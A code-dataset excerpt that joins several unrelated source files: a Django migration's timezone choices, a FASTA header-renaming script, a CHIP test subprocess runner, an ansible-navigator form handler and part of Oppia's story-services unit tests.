Atlantic/Madeira'), (b'Europe/Dublin', b'(GMT+0100) Europe/Dublin'), (b'Europe/Guernsey', b'(GMT+0100) Europe/Guernsey'), (b'Europe/Isle_of_Man', b'(GMT+0100) Europe/Isle_of_Man'), (b'Europe/Jersey', b'(GMT+0100) Europe/Jersey'), (b'Europe/Lisbon', b'(GMT+0100) Europe/Lisbon'), (b'Europe/London', b'(GMT+0100) Europe/London'), (b'Africa/Blantyre', b'(GMT+0200) Africa/Blantyre'), (b'Africa/Bujumbura', b'(GMT+0200) Africa/Bujumbura'), (b'Africa/Cairo', b'(GMT+0200) Africa/Cairo'), (b'Africa/Ceuta', b'(GMT+0200) Africa/Ceuta'), (b'Africa/Gaborone', b'(GMT+0200) Africa/Gaborone'), (b'Africa/Harare', b'(GMT+0200) Africa/Harare'), (b'Africa/Johannesburg', b'(GMT+0200) Africa/Johannesburg'), (b'Africa/Kigali', b'(GMT+0200) Africa/Kigali'), (b'Africa/Lubumbashi', b'(GMT+0200) Africa/Lubumbashi'), (b'Africa/Lusaka', b'(GMT+0200) Africa/Lusaka'), (b'Africa/Maputo', b'(GMT+0200) Africa/Maputo'), (b'Africa/Maseru', b'(GMT+0200) Africa/Maseru'), (b'Africa/Mbabane', b'(GMT+0200) Africa/Mbabane'), (b'Africa/Tripoli', b'(GMT+0200) Africa/Tripoli'), (b'Antarctica/Troll', b'(GMT+0200) Antarctica/Troll'), (b'Arctic/Longyearbyen', b'(GMT+0200) Arctic/Longyearbyen'), (b'Europe/Amsterdam', b'(GMT+0200) Europe/Amsterdam'), (b'Europe/Andorra', b'(GMT+0200) Europe/Andorra'), (b'Europe/Belgrade', b'(GMT+0200) Europe/Belgrade'), (b'Europe/Berlin', b'(GMT+0200) Europe/Berlin'), (b'Europe/Bratislava', b'(GMT+0200) Europe/Bratislava'), (b'Europe/Brussels', b'(GMT+0200) Europe/Brussels'), (b'Europe/Budapest', b'(GMT+0200) Europe/Budapest'), (b'Europe/Busingen', b'(GMT+0200) Europe/Busingen'), (b'Europe/Copenhagen', b'(GMT+0200) Europe/Copenhagen'), (b'Europe/Gibraltar', b'(GMT+0200) Europe/Gibraltar'), (b'Europe/Kaliningrad', b'(GMT+0200) Europe/Kaliningrad'), (b'Europe/Ljubljana', b'(GMT+0200) Europe/Ljubljana'), (b'Europe/Luxembourg', b'(GMT+0200) Europe/Luxembourg'), (b'Europe/Madrid', b'(GMT+0200) Europe/Madrid'), (b'Europe/Malta', b'(GMT+0200) Europe/Malta'), (b'Europe/Monaco', b'(GMT+0200) Europe/Monaco'), (b'Europe/Oslo', b'(GMT+0200) Europe/Oslo'), (b'Europe/Paris', b'(GMT+0200) Europe/Paris'), (b'Europe/Podgorica', b'(GMT+0200) Europe/Podgorica'), (b'Europe/Prague', b'(GMT+0200) Europe/Prague'), (b'Europe/Rome', b'(GMT+0200) Europe/Rome'), (b'Europe/San_Marino', b'(GMT+0200) Europe/San_Marino'), (b'Europe/Sarajevo', b'(GMT+0200) Europe/Sarajevo'), (b'Europe/Skopje', b'(GMT+0200) Europe/Skopje'), (b'Europe/Stockholm', b'(GMT+0200) Europe/Stockholm'), (b'Europe/Tirane', b'(GMT+0200) Europe/Tirane'), (b'Europe/Vaduz', b'(GMT+0200) Europe/Vaduz'), (b'Europe/Vatican', b'(GMT+0200) Europe/Vatican'), (b'Europe/Vienna', b'(GMT+0200) Europe/Vienna'), (b'Europe/Warsaw', b'(GMT+0200) Europe/Warsaw'), (b'Europe/Zagreb', b'(GMT+0200) Europe/Zagreb'), (b'Europe/Zurich', b'(GMT+0200) Europe/Zurich'), (b'Africa/Addis_Ababa', b'(GMT+0300) Africa/Addis_Ababa'), (b'Africa/Asmara', b'(GMT+0300) Africa/Asmara'), (b'Africa/Dar_es_Salaam', b'(GMT+0300) Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'(GMT+0300) Africa/Djibouti'), (b'Africa/Juba', b'(GMT+0300) Africa/Juba'), (b'Africa/Kampala', b'(GMT+0300) Africa/Kampala'), (b'Africa/Khartoum', b'(GMT+0300) Africa/Khartoum'), (b'Africa/Mogadishu', b'(GMT+0300) Africa/Mogadishu'), (b'Africa/Nairobi', b'(GMT+0300) Africa/Nairobi'), (b'Antarctica/Syowa', b'(GMT+0300) Antarctica/Syowa'), (b'Asia/Aden', b'(GMT+0300) Asia/Aden'), (b'Asia/Amman', b'(GMT+0300) Asia/Amman'), (b'Asia/Baghdad', b'(GMT+0300) Asia/Baghdad'), (b'Asia/Bahrain', b'(GMT+0300) Asia/Bahrain'), (b'Asia/Beirut', b'(GMT+0300) Asia/Beirut'), (b'Asia/Damascus', b'(GMT+0300) Asia/Damascus'), (b'Asia/Gaza', b'(GMT+0300) Asia/Gaza'), (b'Asia/Hebron', b'(GMT+0300) Asia/Hebron'), (b'Asia/Jerusalem', b'(GMT+0300) Asia/Jerusalem'), (b'Asia/Kuwait', b'(GMT+0300) Asia/Kuwait'), (b'Asia/Nicosia', b'(GMT+0300) Asia/Nicosia'), (b'Asia/Qatar', b'(GMT+0300) Asia/Qatar'), (b'Asia/Riyadh', b'(GMT+0300) Asia/Riyadh'), (b'Europe/Athens', b'(GMT+0300) Europe/Athens'), (b'Europe/Bucharest', b'(GMT+0300) Europe/Bucharest'), (b'Europe/Chisinau', b'(GMT+0300) Europe/Chisinau'), (b'Europe/Helsinki', b'(GMT+0300) Europe/Helsinki'), (b'Europe/Istanbul', b'(GMT+0300) Europe/Istanbul'), (b'Europe/Kiev', b'(GMT+0300) Europe/Kiev'), (b'Europe/Mariehamn', b'(GMT+0300) Europe/Mariehamn'), (b'Europe/Minsk', b'(GMT+0300) Europe/Minsk'), (b'Europe/Moscow', b'(GMT+0300) Europe/Moscow'), (b'Europe/Riga', b'(GMT+0300) Europe/Riga'), (b'Europe/Simferopol', b'(GMT+0300) Europe/Simferopol'), (b'Europe/Sofia', b'(GMT+0300) Europe/Sofia'), (b'Europe/Tallinn', b'(GMT+0300) Europe/Tallinn'), (b'Europe/Uzhgorod', b'(GMT+0300) Europe/Uzhgorod'), (b'Europe/Vilnius', b'(GMT+0300) Europe/Vilnius'), (b'Europe/Volgograd', b'(GMT+0300) Europe/Volgograd'), (b'Europe/Zaporozhye', b'(GMT+0300) Europe/Zaporozhye'), (b'Indian/Antananarivo', b'(GMT+0300) Indian/Antananarivo'), (b'Indian/Comoro', b'(GMT+0300) Indian/Comoro'), (b'Indian/Mayotte', b'(GMT+0300) Indian/Mayotte'), (b'Asia/Dubai', b'(GMT+0400) Asia/Dubai'), (b'Asia/Muscat', b'(GMT+0400) Asia/Muscat'), (b'Asia/Tbilisi', b'(GMT+0400) Asia/Tbilisi'), (b'Asia/Yerevan', b'(GMT+0400) Asia/Yerevan'), (b'Europe/Samara', b'(GMT+0400) Europe/Samara'), (b'Indian/Mahe', b'(GMT+0400) Indian/Mahe'), (b'Indian/Mauritius', b'(GMT+0400) Indian/Mauritius'), (b'Indian/Reunion', b'(GMT+0400) Indian/Reunion'), (b'Asia/Kabul', b'(GMT+0430) Asia/Kabul'), (b'Asia/Tehran', b'(GMT+0430) Asia/Tehran'), (b'Antarctica/Mawson', b'(GMT+0500) Antarctica/Mawson'), (b'Asia/Aqtau', b'(GMT+0500) Asia/Aqtau'), (b'Asia/Aqtobe', b'(GMT+0500) Asia/Aqtobe'), (b'Asia/Ashgabat', b'(GMT+0500) Asia/Ashgabat'), (b'Asia/Baku', b'(GMT+0500) Asia/Baku'), (b'Asia/Dushanbe', b'(GMT+0500) Asia/Dushanbe'), (b'Asia/Karachi', b'(GMT+0500) Asia/Karachi'), (b'Asia/Oral', b'(GMT+0500) Asia/Oral'), (b'Asia/Samarkand', b'(GMT+0500) Asia/Samarkand'), (b'Asia/Tashkent', b'(GMT+0500) Asia/Tashkent'), (b'Asia/Yekaterinburg', b'(GMT+0500) Asia/Yekaterinburg'), (b'Indian/Kerguelen', b'(GMT+0500) Indian/Kerguelen'), (b'Indian/Maldives', b'(GMT+0500) Indian/Maldives'), (b'Asia/Colombo', b'(GMT+0530) Asia/Colombo'), (b'Asia/Kolkata', b'(GMT+0530) Asia/Kolkata'), (b'Asia/Kathmandu', b'(GMT+0545) Asia/Kathmandu'), (b'Antarctica/Vostok', b'(GMT+0600) Antarctica/Vostok'), (b'Asia/Almaty', b'(GMT+0600) Asia/Almaty'), (b'Asia/Bishkek', b'(GMT+0600) Asia/Bishkek'), (b'Asia/Dhaka', b'(GMT+0600) Asia/Dhaka'), (b'Asia/Novosibirsk', b'(GMT+0600) Asia/Novosibirsk'), (b'Asia/Omsk', b'(GMT+0600) Asia/Omsk'), (b'Asia/Qyzylorda', b'(GMT+0600) Asia/Qyzylorda'), (b'Asia/Thimphu', b'(GMT+0600) Asia/Thimphu'), (b'Asia/Urumqi', b'(GMT+0600) Asia/Urumqi'), (b'Indian/Chagos', b'(GMT+0600) Indian/Chagos'), (b'Asia/Rangoon', b'(GMT+0630) Asia/Rangoon'), (b'Indian/Cocos', b'(GMT+0630) Indian/Cocos'), (b'Antarctica/Davis', b'(GMT+0700) Antarctica/Davis'), (b'Asia/Bangkok', b'(GMT+0700) Asia/Bangkok'), (b'Asia/Ho_Chi_Minh', b'(GMT+0700) Asia/Ho_Chi_Minh'), (b'Asia/Jakarta', b'(GMT+0700) Asia/Jakarta'), (b'Asia/Krasnoyarsk', b'(GMT+0700) Asia/Krasnoyarsk'), (b'Asia/Novokuznetsk', b'(GMT+0700) Asia/Novokuznetsk'), (b'Asia/Phnom_Penh', b'(GMT+0700) Asia/Phnom_Penh'), (b'Asia/Pontianak', b'(GMT+0700) Asia/Pontianak'), (b'Asia/Vientiane', b'(GMT+0700) Asia/Vientiane'), (b'Indian/Christmas', b'(GMT+0700) Indian/Christmas'), (b'Antarctica/Casey', b'(GMT+0800) Antarctica/Casey'), (b'Asia/Brunei', b'(GMT+0800) Asia/Brunei'), (b'Asia/Chita', b'(GMT+0800) Asia/Chita'), (b'Asia/Hong_Kong', b'(GMT+0800) Asia/Hong_Kong'), (b'Asia/Hovd', b'(GMT+0800) Asia/Hovd'), (b'Asia/Irkutsk', b'(GMT+0800) Asia/Irkutsk'), (b'Asia/Kuala_Lumpur', b'(GMT+0800) Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'(GMT+0800) Asia/Kuching'), (b'Asia/Macau', b'(GMT+0800) Asia/Macau'), (b'Asia/Makassar', b'(GMT+0800) Asia/Makassar'), (b'Asia/Manila', b'(GMT+0800) Asia/Manila'), (b'Asia/Shanghai', b'(GMT+0800) Asia/Shanghai'), (b'Asia/Singapore', b'(GMT+0800) Asia/Singapore'), (b'Asia/Taipei', b'(GMT+0800) Asia/Taipei'), (b'Australia/Perth', b'(GMT+0800) Australia/Perth'), (b'Australia/Eucla', b'(GMT+0845) Australia/Eucla'), (b'Asia/Choibalsan', b'(GMT+0900) Asia/Choibalsan'), (b'Asia/Dili', b'(GMT+0900) Asia/Dili'), (b'Asia/Jayapura', b'(GMT+0900) Asia/Jayapura'), (b'Asia/Khandyga', b'(GMT+0900) Asia/Khandyga'), (b'Asia/Pyongyang', b'(GMT+0900) Asia/Pyongyang'), (b'Asia/Seoul', b'(GMT+0900) Asia/Seoul'), (b'Asia/Tokyo', b'(GMT+0900) Asia/Tokyo'), (b'Asia/Ulaanbaatar', b'(GMT+0900) Asia/Ulaanbaatar'), (b'Asia/Yakutsk', b'(GMT+0900) Asia/Yakutsk'), (b'Pacific/Palau', b'(GMT+0900) Pacific/Palau'), (b'Australia/Adelaide', b'(GMT+0930) Australia/Adelaide'), (b'Australia/Broken_Hill', b'(GMT+0930) Australia/Broken_Hill'), (b'Australia/Darwin', b'(GMT+0930) Australia/Darwin'), (b'Antarctica/DumontDUrville', b'(GMT+1000) Antarctica/DumontDUrville'), (b'Asia/Magadan', b'(GMT+1000) Asia/Magadan'), (b'Asia/Sakhalin', b'(GMT+1000) Asia/Sakhalin'), (b'Asia/Ust-Nera', b'(GMT+1000) Asia/Ust-Nera'), (b'Asia/Vladivostok', b'(GMT+1000) Asia/Vladivostok'), (b'Australia/Brisbane', b'(GMT+1000) Australia/Brisbane'), (b'Australia/Currie', b'(GMT+1000) Australia/Currie'), (b'Australia/Hobart', b'(GMT+1000) Australia/Hobart'), (b'Australia/Lindeman', b'(GMT+1000) Australia/Lindeman'), (b'Australia/Melbourne', b'(GMT+1000) Australia/Melbourne'), (b'Australia/Sydney', b'(GMT+1000) Australia/Sydney'), (b'Pacific/Chuuk', b'(GMT+1000) Pacific/Chuuk'), (b'Pacific/Guam', b'(GMT+1000) Pacific/Guam'), (b'Pacific/Port_Moresby', b'(GMT+1000) Pacific/Port_Moresby'), (b'Pacific/Saipan', b'(GMT+1000) Pacific/Saipan'), (b'Australia/Lord_Howe', b'(GMT+1030) Australia/Lord_Howe'), (b'Antarctica/Macquarie', b'(GMT+1100) Antarctica/Macquarie'), (b'Asia/Srednekolymsk', b'(GMT+1100) Asia/Srednekolymsk'), (b'Pacific/Bougainville', b'(GMT+1100) Pacific/Bougainville'), (b'Pacific/Efate', b'(GMT+1100) Pacific/Efate'), (b'Pacific/Guadalcanal', b'(GMT+1100) Pacific/Guadalcanal'), (b'Pacific/Kosrae', b'(GMT+1100) Pacific/Kosrae'), (b'Pacific/Noumea', b'(GMT+1100) Pacific/Noumea'), (b'Pacific/Pohnpei', b'(GMT+1100) Pacific/Pohnpei'), (b'Pacific/Norfolk', b'(GMT+1130) Pacific/Norfolk'), (b'Antarctica/McMurdo', b'(GMT+1200) Antarctica/McMurdo'), (b'Asia/Anadyr', b'(GMT+1200) Asia/Anadyr'), (b'Asia/Kamchatka', b'(GMT+1200) Asia/Kamchatka'), (b'Pacific/Auckland', b'(GMT+1200) Pacific/Auckland'), (b'Pacific/Fiji', b'(GMT+1200) Pacific/Fiji'), (b'Pacific/Funafuti', b'(GMT+1200) Pacific/Funafuti'), (b'Pacific/Kwajalein', b'(GMT+1200) Pacific/Kwajalein'), (b'Pacific/Majuro', b'(GMT+1200) Pacific/Majuro'), (b'Pacific/Nauru', b'(GMT+1200) Pacific/Nauru'), (b'Pacific/Tarawa', b'(GMT+1200) Pacific/Tarawa'), (b'Pacific/Wake', b'(GMT+1200) Pacific/Wake'), (b'Pacific/Wallis', b'(GMT+1200) Pacific/Wallis'), (b'Pacific/Chatham', b'(GMT+1245) Pacific/Chatham'), (b'Pacific/Apia', b'(GMT+1300) Pacific/Apia'), (b'Pacific/Enderbury', b'(GMT+1300) Pacific/Enderbury'), (b'Pacific/Fakaofo', b'(GMT+1300) Pacific/Fakaofo'), (b'Pacific/Tongatapu', b'(GMT+1300) Pacific/Tongatapu'), (b'Pacific/Kiritimati', b'(GMT+1400) Pacific/Kiritimati')])),
],
options={
'verbose_name': 'conference',
'verbose_name_plural': 'conferences',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100, verbose_name='name')),
('slug', models.SlugField()),
('start_date', models.DateField(null=True, verbose_name='start date', blank=True)),
('end_date', models.DateField(null=True, verbose_name='end date', blank=True)),
('conference', models.ForeignKey(verbose_name='conference', to='conference.Conference')),
],
options={
'verbose_name': 'section',
'verbose_name_plural': 'sections',
},
bases=(models.Model,),
),
]
| 544.630435 | 23,334 | 0.690496 |
f5a6a6cbdde36e6007dbda681e3e49bd6a8a889b | 1,350 | py | Python | src/pdc2/scripts/fix_names_from_transdecoder.py | jlanga/smsk_selection | 08070c6d4a6fbd9320265e1e698c95ba80f81123 | [
"MIT"
] | 4 | 2021-07-18T05:20:20.000Z | 2022-01-03T10:22:33.000Z | src/pdc2/scripts/fix_names_from_transdecoder.py | jlanga/smsk_selection | 08070c6d4a6fbd9320265e1e698c95ba80f81123 | [
"MIT"
] | 1 | 2017-08-21T07:26:13.000Z | 2018-11-08T13:59:48.000Z | src/pdc2/scripts/fix_names_from_transdecoder.py | jlanga/smsk_orthofinder | 08070c6d4a6fbd9320265e1e698c95ba80f81123 | [
"MIT"
] | 2 | 2021-07-18T05:20:26.000Z | 2022-03-31T18:23:31.000Z | """
fix EST names to taxonID@seqID before transdecoder
"""
import os,sys
#seq names look like
#>TR10000|c0_g1_i1|m.14496 TR10000|c0_g1_i1|g.14496 ORF TR10000|c0_g1_i1|g.14496 TR10000|c0_g1_i1|m.14496 type:5prime_partial len:180 (+) TR10000|c0_g1_i1:1-540(+)
#>cds.Mecr@gi_11549800_gb_BF478973_1_BF478973|m.9518 Mecr@gi_11549800_gb_BF478973_1_BF478973|g.9518 ORF Mecr@gi_11549800_gb_BF478973_1_BF478973|g.9518 Mecr@gi_11549800_gb_BF478973_1_BF478973|m.9518 type:3prime_partial len:195 (+) Mecr@gi_11549800_gb_BF478973_1_BF478973:86-667(+)
if __name__ =="__main__":
if len(sys.argv) != 3:
print "usage: python fix_names_from_transdecoder.py inDIR outDIR"
sys.exit()
inDIR = sys.argv[1]+"/"
outDIR = sys.argv[2]+"/"
for i in os.listdir(inDIR):
taxonID = i.split(".")[0]
if i.endswith("transdecoder.pep"):
outname = taxonID+".pep.fa"
elif i.endswith("transdecoder.cds"):
outname = taxonID+".cds.fa"
elif i.endswith(".Trinity.fasta"):
os.system("gzip "+inDIR+i)
continue
else: continue
print i
infile = open(inDIR+i,"rU")
outfile = open(outDIR+outname,"w")
for line in infile:
if line[0] == ">":
newid = line.split(" ")[0]
newid = newid.split(".")[-1]
outfile.write(">"+taxonID+"@"+newid+"\n")
else: outfile.write(line)
outfile.close
infile.close()
os.system("gzip "+inDIR+i)
| 31.395349 | 280 | 0.698519 |
aa17a09f4ea5c62aec96daa8d42affacf32687da | 3,460 | py | Python | scripts/tests/chiptest/runner.py | ChengqiangShe/connectedhomeip | 3a617aa821e7c84093ab17313d6ce02d3ec32219 | [
"Apache-2.0"
] | 3 | 2022-02-09T08:42:16.000Z | 2022-02-22T04:47:02.000Z | scripts/tests/chiptest/runner.py | ChengqiangShe/connectedhomeip | 3a617aa821e7c84093ab17313d6ce02d3ec32219 | [
"Apache-2.0"
] | 8 | 2020-07-07T21:51:44.000Z | 2021-07-26T13:43:00.000Z | scripts/tests/chiptest/runner.py | doublemis1/connectedhomeip | 6a08b0404b7b068fd080db504d3eb1edf4bef89f | [
"Apache-2.0"
] | 7 | 2021-04-26T06:22:35.000Z | 2021-12-16T07:10:43.000Z | # Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import subprocess
import sys
import threading
import time
import pty
import re
from dataclasses import dataclass
class LogPipe(threading.Thread):
def __init__(self, level, capture_delegate=None, name=None):
"""Setup the object with a logger and a loglevel
and start the thread
"""
threading.Thread.__init__(self)
self.daemon = False
self.level = level
if sys.platform == 'darwin':
self.fd_read, self.fd_write = pty.openpty()
else:
self.fd_read, self.fd_write = os.pipe()
self.pipeReader = os.fdopen(self.fd_read)
self.captured_logs = []
self.capture_delegate = capture_delegate
self.name = name
self.start()
def CapturedLogContains(self, txt: str):
return any(txt in l for l in self.captured_logs)
def FindLastMatchingLine(self, matcher):
for l in reversed(self.captured_logs):
match = re.match(matcher, l)
if match:
return match
return None
def fileno(self):
"""Return the write file descriptor of the pipe"""
return self.fd_write
def run(self):
"""Run the thread, logging everything."""
for line in iter(self.pipeReader.readline, ''):
logging.log(self.level, line.strip('\n'))
self.captured_logs.append(line)
if self.capture_delegate:
self.capture_delegate.Log(self.name, line)
self.pipeReader.close()
def close(self):
"""Close the write end of the pipe."""
os.close(self.fd_write)
class Runner:
def __init__(self, capture_delegate=None):
self.capture_delegate = capture_delegate
def RunSubprocess(self, cmd, name, wait=True, dependencies=[]):
outpipe = LogPipe(
logging.DEBUG, capture_delegate=self.capture_delegate, name=name + ' OUT')
errpipe = LogPipe(
logging.INFO, capture_delegate=self.capture_delegate, name=name + ' ERR')
if self.capture_delegate:
self.capture_delegate.Log(name, 'EXECUTING %r' % cmd)
s = subprocess.Popen(cmd, stdout=outpipe, stderr=errpipe)
outpipe.close()
errpipe.close()
if not wait:
return s, outpipe, errpipe
while s.poll() is None:
# dependencies MUST NOT be done
for dependency in dependencies:
if dependency.poll() is not None:
s.kill()
raise Exception("Unexpected return %d for %r",
dependency.poll(), dependency)
code = s.wait()
if code != 0:
raise Exception('Command %r failed: %d' % (cmd, code))
else:
logging.debug('Command %r completed with error code 0', cmd)
| 30.892857 | 86 | 0.621387 |
88a666529948068372d471e9d68f76dc1cce6597 | 847 | py | Python | src/ansible_navigator/ui_framework/form_handler_working.py | goneri/ansible-navigator | 59c5c4e9758404bcf363face09cf46c325b01ad3 | [
"Apache-2.0"
] | null | null | null | src/ansible_navigator/ui_framework/form_handler_working.py | goneri/ansible-navigator | 59c5c4e9758404bcf363face09cf46c325b01ad3 | [
"Apache-2.0"
] | null | null | null | src/ansible_navigator/ui_framework/form_handler_working.py | goneri/ansible-navigator | 59c5c4e9758404bcf363face09cf46c325b01ad3 | [
"Apache-2.0"
] | null | null | null | """working handler, instant 1112065
utf-8 max = 112064
"""
from typing import TYPE_CHECKING
from typing import List
from typing import Tuple
from .curses_window import CursesWindow
if TYPE_CHECKING:
from .field_working import FieldWorking # pylint: disable=cyclic-import
class FormHandlerWorking(CursesWindow):
"""handle form button"""
def __init__(self, screen, ui_config):
"""Initialize the handler for a form working notification.
:param screen: A curses window
:param ui_config: The current user interface configuration
"""
super().__init__(ui_config=ui_config)
self._screen = screen
@staticmethod
def handle(idx, form_fields: List) -> Tuple["FieldWorking", int]:
"""handle the information field, immediate return"""
return form_fields[idx], 112065
| 26.46875 | 76 | 0.70366 |
0e1ace7891c411af6dfb381018dd4408151a9848 | 91,192 | py | Python | core/domain/story_services_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | 1 | 2021-08-17T20:33:12.000Z | 2021-08-17T20:33:12.000Z | core/domain/story_services_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | null | null | null | core/domain/story_services_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the methods defined in story services."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import logging
import os
from constants import constants
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import param_domain
from core.domain import story_domain
from core.domain import story_fetchers
from core.domain import story_services
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import python_utils
import utils
(story_models, user_models) = models.Registry.import_models(
[models.NAMES.story, models.NAMES.user])
class StoryServicesUnitTests(test_utils.GenericTestBase):
"""Test the story services module."""
STORY_ID = None
EXP_ID = 'exp_id'
NODE_ID_1 = story_domain.NODE_ID_PREFIX + '1'
NODE_ID_2 = 'node_2'
USER_ID = 'user'
story = None
def setUp(self):
super(StoryServicesUnitTests, self).setUp()
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.STORY_ID = story_services.get_new_story_id()
self.TOPIC_ID = topic_fetchers.get_new_topic_id()
self.save_new_topic(
self.TOPIC_ID, self.USER_ID, name='Topic',
abbreviated_name='topic-one', url_fragment='topic-one',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=['skill_4'], subtopics=[],
next_subtopic_id=0)
self.save_new_story(self.STORY_ID, self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, self.STORY_ID)
self.save_new_valid_exploration(
self.EXP_ID, self.user_id_admin, end_state_name='End',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_admin, self.EXP_ID)
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': self.EXP_ID
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Added node.')
self.story = story_fetchers.get_story_by_id(self.STORY_ID)
self.set_admins([self.ADMIN_USERNAME])
self.set_topic_managers([user_services.get_username(self.user_id_a)])
self.user_a = user_services.get_user_actions_info(self.user_id_a)
self.user_b = user_services.get_user_actions_info(self.user_id_b)
self.user_admin = user_services.get_user_actions_info(
self.user_id_admin)
def test_compute_summary(self):
story_summary = story_services.compute_summary_of_story(self.story)
self.assertEqual(story_summary.id, self.STORY_ID)
self.assertEqual(story_summary.title, 'Title')
self.assertEqual(story_summary.description, 'Description')
self.assertEqual(story_summary.node_titles, ['Title 1'])
self.assertEqual(story_summary.thumbnail_bg_color, None)
self.assertEqual(story_summary.thumbnail_filename, None)
def test_get_new_story_id(self):
new_story_id = story_services.get_new_story_id()
self.assertEqual(len(new_story_id), 12)
self.assertEqual(story_models.StoryModel.get_by_id(new_story_id), None)
def test_commit_log_entry(self):
story_commit_log_entry = (
story_models.StoryCommitLogEntryModel.get_commit(self.STORY_ID, 1)
)
self.assertEqual(story_commit_log_entry.commit_type, 'create')
self.assertEqual(story_commit_log_entry.story_id, self.STORY_ID)
self.assertEqual(story_commit_log_entry.user_id, self.USER_ID)
def test_update_story_properties(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_TITLE,
'old_value': 'Title',
'new_value': 'New Title'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_DESCRIPTION,
'old_value': 'Description',
'new_value': 'New Description'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_THUMBNAIL_FILENAME,
'old_value': None,
'new_value': 'image.svg'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': (
story_domain.STORY_PROPERTY_THUMBNAIL_BG_COLOR),
'old_value': None,
'new_value': constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': (
story_domain.STORY_PROPERTY_META_TAG_CONTENT),
'old_value': None,
'new_value': 'new story meta tag content'
})
]
# Save a dummy image on filesystem, to be used as thumbnail.
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.ENTITY_TYPE_STORY, self.STORY_ID))
fs.commit(
'%s/image.svg' % (constants.ASSET_TYPE_THUMBNAIL), raw_image,
mimetype='image/svg+xml')
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Updated Title and Description.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.title, 'New Title')
self.assertEqual(story.description, 'New Description')
self.assertEqual(story.thumbnail_filename, 'image.svg')
self.assertEqual(story.thumbnail_size_in_bytes, len(raw_image))
self.assertEqual(
story.thumbnail_bg_color,
constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0])
self.assertEqual(story.version, 3)
self.assertEqual(story.meta_tag_content, 'new story meta tag content')
story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID)
self.assertEqual(story_summary.title, 'New Title')
self.assertEqual(story_summary.node_titles, ['Title 1'])
self.assertEqual(
story_summary.thumbnail_bg_color,
constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0])
self.assertEqual(story_summary.thumbnail_filename, 'image.svg')
def test_update_story_node_properties(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESCRIPTION),
'node_id': self.NODE_ID_2,
'old_value': '',
'new_value': 'Description 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_2,
'old_value': [],
'new_value': [self.NODE_ID_1]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': self.NODE_ID_2,
